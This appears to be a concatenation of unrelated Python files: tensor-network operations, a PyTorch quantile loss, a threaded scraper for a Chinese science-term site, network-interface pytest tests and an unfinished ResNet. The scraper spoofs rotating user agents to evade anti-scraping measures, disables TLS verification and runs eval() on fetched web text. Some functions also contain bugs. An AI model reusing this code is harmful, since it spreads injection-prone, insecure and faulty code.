backends_check = [backend_names[0] == name for name in backend_names[1:]]
all_backends_same = all(backends_check)
errstr = ""
if not all_backends_same:
errstr = "All Tensors fed to " + fname + "must have the same backend."
errstr += "Backends were: \n"
errstr += str([name + "\n" for name in backend_names])
return all_backends_same, errstr
def tensordot(a: Tensor, b: Tensor,
axes: Union[int, Sequence[Sequence[int]]]) -> Tensor:
"""Do a tensordot (contraction) of Tensors `a` and `b` over the given axes.
The behaviour of this function largely matches that of np.tensordot.
Args:
a: A Tensor.
b: Another Tensor.
axes: Two lists of integers. These values are the contraction
axes. A single integer may also be supplied, in which case both
tensors are contracted over this axis.
Raises:
ValueError, if a and b have different backends.
Returns:
The result of the tensordot, a Tensor.
"""
if a.backend.name != b.backend.name:
errstr = "Tried to Tensordot Tensors with differing backends \n"
errstr += a.backend.name + "and " + b.backend.name + "."
raise ValueError(errstr)
out_array = a.backend.tensordot(a.array, b.array, axes)
out_tensor = Tensor(out_array, backend=a.backend)
return out_tensor
def reshape(tensor: Tensor, new_shape: Sequence[int]) -> Tensor:
"""Reshape Tensor to the given shape.
Args:
tensor: Tensor to reshape.
new_shape: The new shape.
Returns:
The reshaped Tensor.
"""
return tensor.reshape(new_shape)
def transpose(tensor: Tensor, perm: Optional[Sequence[int]] = None) -> Tensor:
""" Return a new `Tensor` transposed according to the permutation set
by `axes`. By default the axes are reversed.
Args:
axes: The permutation. If None (default) the index order is reversed.
Returns:
The transposed `Tensor`.
"""
return tensor.transpose(perm=perm)
def take_slice(tensor: Tensor, start_indices: Tuple[int, ...],
slice_sizes: Tuple[int, ...]) -> Tensor:
"""Obtains a slice of a Tensor based on start_indices and slice_sizes.
Args:
Tensor: A Tensor.
start_indices: Tuple of integers denoting start indices of slice.
slice_sizes: Tuple of integers denoting size of slice along each axis.
Returns:
The slice, a Tensor.
"""
sliced = tensor.backend.slice(tensor.array, start_indices, slice_sizes)
sliced_tensor = Tensor(sliced, backend=tensor.backend)
return sliced_tensor
def shape(tensor: Tensor) -> Tuple[int, ...]:
"""Get the shape of a Tensor as a tuple of integers.
Args:
Tensor: A Tensor.
Returns:
The shape of the input Tensor.
"""
return tensor.shape
def sqrt(tensor: Tensor) -> Tensor:
"""Take the square root (element wise) of a given Tensor."""
out_array = tensor.backend.sqrt(tensor.array)
return Tensor(out_array, backend=tensor.backend)
def outer(tensor1: Tensor, tensor2: Tensor) -> Tensor:
"""Calculate the outer product of the two given Tensors."""
tensors = [tensor1, tensor2]
all_backends_same, errstr = _check_backends(tensors, "outer")
if not all_backends_same:
raise ValueError(errstr)
out_data = tensor1.backend.outer_product(tensor1.array, tensor2.array)
return Tensor(out_data, backend=tensor1.backend)
def einsum(expression: Text, *tensors: Tensor, optimize: bool) -> Tensor:
"""Calculate sum of products of Tensors according to expression."""
all_backends_same, errstr = _check_backends(tensors, "einsum")
if not all_backends_same:
raise ValueError(errstr)
backend = tensors[0].backend
arrays = [tensor.array for tensor in tensors]
result_data = backend.einsum(expression, *arrays, optimize=optimize)
return Tensor(result_data, backend=backend)
def conj(tensor: Tensor) -> Tensor:
"""
Return the complex conjugate of `Tensor`
Args:
Tensor: A Tensor.
Returns:
The complex conjugated Tensor.
"""
return tensor.conj()
def hconj(tensor: Tensor, perm: Optional[Sequence[int]] = None) -> Tensor:
""" The Hermitian conjugated tensor; e.g. the complex conjugate tranposed
by the permutation set be `axes`. By default the axes are reversed.
Args:
tensor: The Tensor to conjugate.
axes: The permutation. If None (default) the index order is reversed.
Returns:
The Hermitian conjugated `Tensor`.
"""
return tensor.hconj(perm=perm)
def sin(tensor: Tensor) -> Tensor:
"""
Return sin of `Tensor`.
Args:
Tensor: A Tensor.
Returns:
Tensor
"""
out_array = tensor.backend.sin(tensor.array)
return Tensor(out_array, backend=tensor.backend)
def cos(tensor: Tensor) -> Tensor:
"""
Return cos of `Tensor`.
Args:
Tensor: A Tensor.
Returns:
Tensor
"""
out_array = tensor.backend.cos(tensor.array)
return Tensor(out_array, backend=tensor.backend)
def exp(tensor: Tensor) -> Tensor:
"""
Return elementwise exp of `Tensor`.
Args:
Tensor: A Tensor.
Returns:
Tensor
"""
out_array = tensor.backend.exp(tensor.array)
return Tensor(out_array, backend=tensor.backend)
def log(tensor: Tensor) -> Tensor:
"""
Return elementwise natural logarithm of `Tensor`.
Args:
Tensor: A Tensor.
Returns:
Tensor
"""
out_array = tensor.backend.log(tensor.array)
return Tensor(out_array, backend=tensor.backend)
def diagonal(tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""
Extracts the offset'th diagonal from the matrix slice of tensor indexed
by (axis1, axis2).
Args:
tensor: A Tensor.
offset: Offset of the diagonal from the main diagonal.
axis1, axis2: Indices of the matrix slice to extract from.
Returns:
out : A 1D Tensor storing the elements of the selected diagonal.
"""
backend = tensor.backend
result = backend.diagonal(tensor.array, offset=offset, axis1=axis1,
axis2=axis2)
return Tensor(result, backend=backend)
def diagflat(tensor: Tensor, k: int = 0) -> Tensor:
"""
Flattens tensor and places its elements at the k'th diagonal of a new
(tensor.size + k, tensor.size + k) `Tensor` of zeros.
Args:
tensor: A Tensor.
k : The elements of tensor will be stored at this diagonal.
Returns:
out : A (tensor.size + k, tensor.size + k) `Tensor` with the elements
of tensor on its kth diagonal.
"""
backend = tensor.backend
result = backend.diagflat(tensor.array, k=k)
return Tensor(result, backend=backend)
def trace(tensor: Tensor, offset: int = 0, axis1: int = -2,
axis2: int = -1) -> Tensor:
"""Calculate the sum along diagonal entries of the given Tensor. The
entries of the offset`th diagonal of the matrix slice of tensor indexed by
(axis1, axis2) are summed.
Args:
tensor: A Tensor.
offset: Offset of the diagonal from the main diagonal.
axis1, axis2: Indices of the matrix slice to extract from.
Returns:
out: The trace.
"""
backend = tensor.backend
result = backend.trace(tensor.array, offset=offset, axis1=axis1,
axis2=axis2)
return Tensor(result, backend=backend)
def ncon(
tensors: Sequence[Tensor],
network_structure: Sequence[Sequence[Union[str, int]]],
con_order: Optional[Sequence] = None,
out_order: Optional[Sequence] = None,
check_network: bool = True,
) -> Tensor:
r"""Contracts a list of tn.Tensor according to a tensor network
specification.
The network is provided as a list of lists, one for each
tensor, specifying the labels for the edges connected to that tensor.
Labels can be any numbers or strings. Negative number-type labels
and string-type labels with a prepended hyphen ('-') are open labels
and remain uncontracted.
Positive number-type labels and string-type labels with no prepended
hyphen ('-') are closed labels and are contracted.
Any open label appearing more than once is treated as an open
batch label. Any closed label appearing more than once is treated as
a closed batch label.
Upon finishing the contraction, all open batch labels will have been
collapsed into a single dimension, and all closed batch labels will
have been summed over.
If `out_order = None`, output labels are ordered according to descending
number ordering and ascending ASCII ordering, with number labels always
appearing before string labels. Example:
network_structure = [[-1, 1, '-rick', '2',-2], [-2, '2', 1, '-morty']]
results in an output order of [-1, -2, '-morty', '-rick'].
If `out_order` is given, the indices of the resulting tensor will be
transposed into this order.
If `con_order = None`, `ncon` will first contract all number labels
in ascending order followed by all string labels in ascending ASCII
order.
If `con_order` is given, `ncon` will contract according to this order.
For example, matrix multiplication:
.. code-block:: python
A = np.array([[1.0, 2.0], [3.0, 4.0]])
B = np.array([[1.0, 1.0], [0.0, 1.0]])
ncon([A,B], [(-1, 1), (1, -2)])
Matrix trace:
.. code-block:: python
A = np.array([[1.0, 2.0], [3.0, 4.0]])
ncon([A], [(1, 1)]) # 5.0
Note:
Disallowing `0` as an edge label is legacy behaviour, see
`original NCON implementation`_.
.. _original NCON implementation:
https://arxiv.org/abs/1402.0939
Args:
tensors: List of `Tensors`.
network_structure: List of lists specifying the tensor network structure.
con_order: List of edge labels specifying the contraction order.
out_order: List of edge labels specifying the output order.
check_network: Boolean flag. If `True` check the network.
backend: String specifying the backend to use. Defaults to
`tensornetwork.backend_contextmanager.get_default_backend`.
Returns:
The result of the contraction. The result is returned as a `Node`
if all elements of `tensors` are `AbstractNode` objects, else
it is returned as a `Tensor` object.
"""
all_backends_same, errstr = _check_backends(tensors, "ncon")
if not all_backends_same:
raise ValueError(errstr)
backend = tensors[0].backend
arrays = [tensor.array for tensor in tensors]
res = ncon_interface.ncon(arrays, network_structure, con_order=con_order,
out_order=out_order, check_network=check_network,
backend=backend)
output = Tensor(res, backend=backend)
return output
def sign(tensor: Tensor) -> Tensor:
""" Returns the sign of the elements of Tensor.
"""
backend = tensor.backend
result = backend.sign(tensor.array)
return Tensor(result, backend=backend)
# pylint: disable=redefined-builtin
def abs(tensor: Tensor) -> Tensor:
""" Returns the absolute value of the elements of Tensor.
"""
backend = tensor.backend
result = backend.abs(tensor.array)
return Tensor(result, backend=backend)
def pivot(tensor: Tensor, pivot_axis: int = -1) -> Tensor:
""" Reshapes tensor into a matrix about the pivot_axis. Equivalent to
tensor.reshape(prod(tensor.shape[:pivot_axis]),
prod(tensor.shape[pivot_axis:])).
Args:
tensor: The input tensor.
pivot_axis: Axis to pivot around.
"""
backend = tensor.backend
result = backend.pivot(tensor.array, pivot_axis=pivot_axis)
return Tensor(result, backend=backend)
def kron(tensorA: Tensor, tensorB: Tensor, pivot_axisA: int = -1,
pivot_axisB: int = -1) -> Tensor:
"""
Reshape tensorA and tensorB into matrices respectively about pivot_axisA and
pivot_axisB, computes the Kronecker product of those matrices, and
reshapes to the concatenated shape of tensorA and tensorB
(e.g. tensorA -> (2, 3); tensorB -> (4, 5); result -> (2, 3, 4, 5)).
"""
tensors = [tensorA, tensorA]
all_backends_same, errstr = _check_backends(tensors, "kron")
if not all_backends_same:
raise ValueError(errstr)
backend = tensorA.backend
matrixA = pivot(tensorA, pivot_axis=pivot_axisA)
matrixB = pivot(tensorB, pivot_axis=pivot_axisB)
arr = backend.einsum("ij,kl->ikjl", matrixA.array, matrixB.array)
full_shape = tuple(list(tensorA.shape) + list(tensorB.shape))
return Tensor(arr, backend=backend).reshape(full_shape)
| StarcoderdataPython |
6667027 | from typing import List, Optional, Tuple
import numpy as np
import torch
import torch.nn as nn
from gluonts.core.component import validated
class QuantileLoss(nn.Module):
@validated()
def __init__(
self,
quantiles: List[float],
quantile_weights: Optional[List[float]] = None,
) -> None:
super().__init__()
self.quantiles = quantiles
self.num_quantiles = len(quantiles)
self.quantile_weights = (
[1.0 / self.num_quantiles for i in range(self.num_quantiles)]
if not quantile_weights
else quantile_weights
)
def forward(self, y_true: torch.Tensor, y_pred: torch.Tensor, sample_weight=None):
if self.num_quantiles > 1:
y_pred_all = torch.chunk(y_pred, self.num_quantiles, dim=-1)
else:
y_pred_all = [y_pred]
qt_loss = []
for i, y_pred_q in enumerate(y_pred_all):
q = self.quantiles[i]
weighted_qt = (
self.compute_quantile_loss(y_true, y_pred_q.squeeze(-1), q)
* self.quantile_weights[i]
)
qt_loss.append(weighted_qt)
stacked_qt_losses = torch.stack(qt_loss, dim=-1)
sum_qt_loss = torch.mean(stacked_qt_losses, dim=-1)
if sample_weight is not None:
return sample_weight * sum
else:
return sum_qt_loss
@staticmethod
def compute_quantile_loss(
y_true: torch.Tensor, y_pred_p: torch.Tensor, p: float
) -> torch.Tensor:
under_bias = p * torch.clamp(y_true - y_pred_p, min=0)
over_bias = (1 - p) * torch.clamp(y_pred_p - y_true, min=0)
qt_loss = 2 * (under_bias + over_bias)
return qt_loss
class ProjectParams(nn.Module):
@validated()
def __init__(self, in_features, num_quantiles):
super().__init__()
self.projection = nn.Linear(in_features=in_features, out_features=num_quantiles)
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self.projection(x)
class QuantileOutput:
@validated()
def __init__(
self,
input_size,
quantiles: List[float],
quantile_weights: Optional[List[float]] = None,
) -> None:
self.input_size = input_size
self.quantiles = quantiles
self.quantile_weights = quantile_weights
def get_loss(self) -> nn.Module:
return QuantileLoss(
quantiles=self.quantiles, quantile_weights=self.quantile_weights
)
def get_quantile_proj(self) -> nn.Module:
return ProjectParams(
in_features=self.input_size, num_quantiles=len(self.quantiles)
)
| StarcoderdataPython |
5018170 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: <NAME>
@Date: Arg 10, 2020
"""
# Import necessary packages
import os
import ssl
import json
import time
import requests
import numpy as np
import pandas as pd
from urllib import request
from bs4 import BeautifulSoup
from random import randint
import urllib3
import threading
# Disable all kinds of warnings
urllib3.disable_warnings()
# Avoid SSL Certificate to access the HTTP website
ssl._create_default_https_context = ssl._create_unverified_context
def read_url(ID: str) -> str:
"""
Read the website and return the contents of the website
:param ID: The ID of the website
:return soup.text: The contents of the website
"""
# URL of the website + ID for every word website
url = 'https://www.nstl.gov.cn/execute?target=nstl4.search4&function=paper/pc/detail&id=C0200' + ID
# A fake device to avoid the Anti reptile
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
]
random_agent = USER_AGENTS[randint(0, len(USER_AGENTS) - 1)]
headers = {
'User-Agent': random_agent,
}
for j in range(10):
try:
res = requests.get(url, headers=headers,
verify=False, timeout=(5, 10))
contents = res.text
except Exception as e:
if j >= 9:
print('The exception has happened', '-' * 100)
else:
time.sleep(0.5)
else:
time.sleep(0.5)
break
return contents
def find_English_term(content: str):
"""
Find the English Term from the contents
:param content: The contents of the website
:return Eng_term: The found English term
:return content: The contents that cut the English term part
"""
mark = content.find('范畴号') + len('范畴号')
temp_cont = content[mark:mark + 100]
# START and END of the English term
START = temp_cont.find('["')
END = temp_cont.find('"]')
Eng_term = temp_cont[START + 2:END]
# Cut the English term part from the contents
content = content[content.find('名称') + len('名称'):]
return Eng_term, content
def find_Chinese_term(content: str):
"""
Find the Chinese Term from the contents
:param content: The contents of the website
:return Chi_term: The found Chinese Term
:return content: The contents that cut the Chinese term part
"""
# If there is no Chinese Term available, then continue
if '中文名称' not in content:
Chi_term = ''
else:
# START and END of the Chinese Term
START = content.find('["') + len('["')
END = content.find('中文名称') - len('"],"n":"')
Chi_term = content[START:END]
# Cut the Chinese term part from the contents
content = content[content.find('中文名称') + len('中文名称'):]
return Chi_term, content
def find_English_definition(content: str) -> tuple:
"""
Find the English Definition from the content
:param content: The contents of the website
:return Eng_def: The found English definition
:return content: The contents that cut the English definition part
"""
# If there is no English definition available, then continue
if '释义' not in content:
Eng_def = ''
else:
# START and END of the English Definition
START = content.find('"f":"def","v"') + len('"f":"def","v":["')
END = content.find('释义')
Eng_def = content[START:END - len('"],"n":"')]
# Cut the English Definition part from the contents
content = content[END + len('释义'):]
return Eng_def, content
def synonym(content: str):
"""
Find all the Synonym words w.r.t. the English term
:param content: The contents of the website
:return synonym_words: The found synonym words
"""
# If there is no Synonym Words available, then continue
if '同义词' not in content:
synonym_words = ''
else:
# Find the Synonym words' mark from the content
mark = content.find('linkToBaTeleva') + len('linkToBaTeleva')
new_content = content[mark:]
# START and END of the Synonym words
START = new_content.find('["') + len('[')
END = new_content.find('名称') - len('],"n":"')
synonym_words = new_content[START:END]
return synonym_words
def field(ID: str):
"""
Find and save all the Fields of this particular term
:param ID: The ID of a particular website (word)
:return content: The Fields contents
"""
# URL of the Fields contents
url = 'https://www.nstl.gov.cn/execute?target=nstl4.search4&function=stkos/pc/detail/ztree&id=C0200' + ID
# A fake device to avoid the Anti reptile
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
]
random_agent = USER_AGENTS[randint(0, len(USER_AGENTS) - 1)]
headers = {
'User-Agent': random_agent,
}
for j in range(10):
try:
res = requests.get(url, headers=headers,
verify=False, timeout=(5, 10))
except Exception as e:
if j >= 9:
print('The exception has happened', '-' * 100)
else:
time.sleep(0.5)
else:
time.sleep(0.1)
break
content = res.text
# Remove some useless contents from the Fields contents
# e.g., "total":1,"code":0,
# ,"value":"180911","font":{"color":"#999"}}
START = content.find('code') + len('code":0,')
content = content[START:]
content = content.replace(',"font":{"color":"#999"}', '')
content = content.replace('"data"', '"Fields"')
while '"value"' in content:
mark = content.find('"value"')
temp_cont = content[mark:mark + 100]
end = temp_cont.find('"}')
true_start = mark - 1
true_end = mark + end + 1
content = content.replace(content[true_start:true_end], '')
return content
class MyEncoder(json.JSONEncoder):
"""
Used to save the numpy array into JSON file
"""
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(MyEncoder, self).default(obj)
def save_json(saved_data: list, save_name: str):
'''
Save the data (np.array) into JSON file
:param saved_data: the dataset which should be saved
:param save_name: the saved path of the JSON file
:return: saved file
'''
file = open(save_name, 'w', encoding='utf-8')
json.dump(saved_data, file, ensure_ascii=False, indent=4, cls=MyEncoder)
file.close()
def run_code(start_index: int, end_index: int):
"""
Run Codes for using multiple threads
:param start_page: The start page ID
:param end_page: The end page ID
"""
JSON_file = ''
for i in range(start_index, end_index):
if i < 10:
i = '0000' + str(i)
elif 10 <= i < 100:
i = '000' + str(i)
elif 100 <= i < 1000:
i = '00' + str(i)
elif 1000 <= i < 10000:
i = '0' + str(i)
else:
i = str(i)
# Get the contents of the website
contents = read_url(ID=i)
# If there is nothing in this website, then skip and continue
if 'linkToCaClnotn' not in contents:
print('There is no data in this webpage! Skip and continue......')
continue
else:
# Find the English Term from the contents
Eng_term, con_cut_eng = find_English_term(content=contents)
# Find the Chinese Term from the contents
Chi_term, con_cut_chi = find_Chinese_term(content=con_cut_eng)
# Find the English Definition from the contents
Eng_def, con_cut_def = find_English_definition(content=con_cut_chi)
# Find the Synonym Words from the contents
synonym_word = synonym(content=con_cut_chi)
# Find the Fields from another contents
field_names = field(ID=i)
# Combine all the found data and make string for JSON
JSON_file += '{'
JSON_file += '"English Term": ["'
JSON_file += Eng_term
JSON_file += '"], '
JSON_file += '"Chinese Term": ["'
JSON_file += Chi_term
JSON_file += '"], '
JSON_file += '"English Definition": ["'
JSON_file += Eng_def
JSON_file += '"], '
JSON_file += '"Synonym Words": ['
JSON_file += synonym_word
JSON_file += '], '
JSON_file += field_names
# Save the JSON File for each word
save_json(eval(JSON_file), save_path + '%s_word.json' % i)
print('The %s word JSON file has been successfully saved!' % i)
# The main function
if __name__ == '__main__':
# Several initialized values or lists
save_index = 1
# The saved path for the JSON and Excel files
save_path = 'NSTD-data-2020/'
if not os.path.exists(save_path):
os.mkdir(save_path)
threadl = []
task1 = threading.Thread(target=run_code, args=(29329, 33329))
task2 = threading.Thread(target=run_code, args=(33329, 37329))
task3 = threading.Thread(target=run_code, args=(37329, 41329))
task4 = threading.Thread(target=run_code, args=(41329, 45329))
task5 = threading.Thread(target=run_code, args=(45329, 49329))
task6 = threading.Thread(target=run_code, args=(49329, 53329))
task7 = threading.Thread(target=run_code, args=(53329, 54487))
task1.start()
task2.start()
task3.start()
task4.start()
task5.start()
task6.start()
task7.start()
| StarcoderdataPython |
9628415 | <gh_stars>0
n1 = float(input('Quanto em dinheiro você tem na carteira'))
dolar = n1 / 3.27
print('O valor que você tem na carteira corresponde a: {:.2f} dolares'.format(dolar)) | StarcoderdataPython |
6814 | <reponame>sbarguil/Testing-framework<filename>AutomationFramework/tests/interfaces/test_if_subif.py
import pytest
from AutomationFramework.page_objects.interfaces.interfaces import Interfaces
from AutomationFramework.tests.base_test import BaseTest
class TestInterfacesSubInterfaces(BaseTest):
test_case_file = 'if_subif.yml'
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_description',
'page_object_class': Interfaces}])
def test_if_subif_description(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_enabled',
'page_object_class': Interfaces}])
def test_if_subif_enabled(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_prefix_length',
'page_object_class': Interfaces}])
def test_if_subif_ip_prefix_length(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_ip_state',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_ip_state(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('multiple_create_page_objects_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_origin',
'page_object_rpcs_classes': [Interfaces, Interfaces],
'rpc_clean_order': None,
}])
def test_if_subif_origin(self, multiple_create_page_objects):
for page_object in multiple_create_page_objects:
page_object.execute_interface_rpc()
assert page_object.validate_rpc(), page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_dhcp_client',
'page_object_class': Interfaces}])
def test_if_subif_dhcp_client(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_mtu',
'page_object_class': Interfaces}])
def test_if_subif_mtu(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_inner_outer_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_inner_outer_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
@pytest.mark.parametrize('create_page_object_arg', [{'test_case_file': test_case_file,
'test_case_name': 'if_subif_match_vlan_id',
'page_object_class': Interfaces}])
def test_if_subif_match_vlan_id(self, create_page_object):
create_page_object.execute_generic_interfaces_edit_config_test_case()
assert create_page_object.generic_validate_test_case_params(), create_page_object.get_test_case_description()
| StarcoderdataPython |
6477315 | from math import gamma
import torch.nn as nn
import torch
import torch.optim as optim
from torchvision import datasets
from torchvision.transforms import ToTensor
from torch.utils.data import DataLoader, random_split
import time
import torch.optim.lr_scheduler as lr_s
import torchvision.transforms as transforms
from Block import Block
class CircResNet(nn.Module):
def __init__(self):
super(CircResNet, self).__init__()
self.relu = nn.GELU() #nn.ReLU()
self.softmax = nn.Softmax(dim = 1)
self.dropout = nn.Dropout(p = 0.5)
self.conv1 = nn.Conv2d(in_channels = 3, out_channels = 16, stride = 1, kernel_size = 3, padding = 1, bias = False)
self.bn1 = nn.BatchNorm2d(16)
self.blockset1 = nn.Sequential(
Block(16, 16, stride = 1),
Block(16, 16, stride = 1),
Block(16, 16, stride = 1),
Block(16, 16, stride = 1),
Block(16, 16, stride = 1)
)
self.blockset2 = nn.Sequential(
Block(16, 32, stride = 2),
Block(32, 32, stride = 1),
Block(32, 32, stride = 1),
Block(32, 32, stride = 1),
Block(32, 32, stride = 1)
)
self.blockset3 = nn.Sequential(
Block(32, 64, stride = 2),
Block(64, 64, stride = 1),
Block(64, 64, stride = 1),
Block(64, 64, stride = 1),
Block(64, 64, stride = 1)
)
#self.pool = nn.AvgPool2d(kernel_size = 8, stride = 1)
# self.conv2 = nn.Conv2d(64, 3, kernel_size = 1, stride = 1, padding = 0, bias = False)
# self.bn2 = nn.BatchNorm2d(3)
self.fc = nn.Linear(4096, 3072)
for m in self.modules():
#print(m)
if isinstance(m, Block):
nn.init.kaiming_normal_(m.conv1.weight, mode = 'fan_out', nonlinearity = 'relu')
nn.init.kaiming_normal_(m.conv2.weight, mode = 'fan_out', nonlinearity = 'relu')
nn.init.constant_(m.bn1.weight, 1)
nn.init.constant_(m.bn1.bias, 0)
nn.init.constant_(m.bn2.weight, 1)
nn.init.constant_(m.bn2.bias, 0)
elif isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode = 'fan_out', nonlinearity = 'relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def forward(self, x):
x = self.dropout(x)
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.blockset1(x)
x = self.blockset2(x)
x = self.blockset3(x)
# Current Shape (500, 64, 8, 8) # 4096
# Shape needed (500, 3, 32, 32) # 3072
# x = self.conv2(x)
# x = self.bn2(x)
# x = self.relu(x)
